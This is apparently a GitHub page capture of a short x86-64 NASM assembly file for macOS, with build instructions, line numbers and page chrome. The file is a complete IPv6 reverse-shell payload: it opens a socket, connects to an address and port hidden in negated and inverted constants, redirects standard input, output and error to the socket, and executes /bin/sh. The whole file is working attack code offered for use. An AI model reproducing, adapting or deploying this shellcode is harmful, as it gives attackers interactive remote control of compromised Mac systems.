-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathmacosx-ipv6rev.s
73 lines (63 loc) · 1.33 KB
/
macosx-ipv6rev.s
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
;nasm -f macho64 -o ipv6rev.o ipv6rev.s && ld -macosx_version_min 10.7.0 -o ipv6rev ipv6rev.o
BITS 64
section .text
global start
start:
; socket(AF_INET6, SOCK_STREAM, IPPROTO_IP)
xor rdi, rdi
mul rdi
mov dil, 0x1e
xor rsi, rsi
mov sil, 0x1
mov al, 0x2
ror rax, 0x28
mov r8, rax
mov al, 0x61
syscall
; struct sockaddr_in6 {
; __uint8_t sin6_len;
; sa_family_t sin6_family;
; in_port_t sin6_port;
; __uint32_t sin6_flowinfo;
; struct in6_addr sin6_addr;
; __uint32_t sin6_scope_id;
; };
xor rsi, rsi
push rsi
mov rbx, 0xfeffffffffffffff
not rbx
push rbx
push rsi
mov rsi, 0xffffffffa3eee1e4
neg rsi
push rsi
push rsp
pop rsi
; connect(sockid, &sockaddr, 28)
mov rdi, rax
xor dl, 0x1c
mov rax, r8
mov al, 0x62
syscall
xor rsi, rsi
mov sil, 0x3
dup2:
; dup2(sockid, 2)
; -> dup2(sockid, 1)
; -> dup2(sockid, 0)
mov rax, r8
mov al, 0x5a
sub sil, 1
syscall
test rsi, rsi
jne dup2
; execve("//bin/sh", 0, 0)
push rsi
mov rdi, 0x68732f6e69622f2f
push rdi
push rsp
pop rdi
xor rdx, rdx
mov rax, r8
mov al, 0x3b
syscall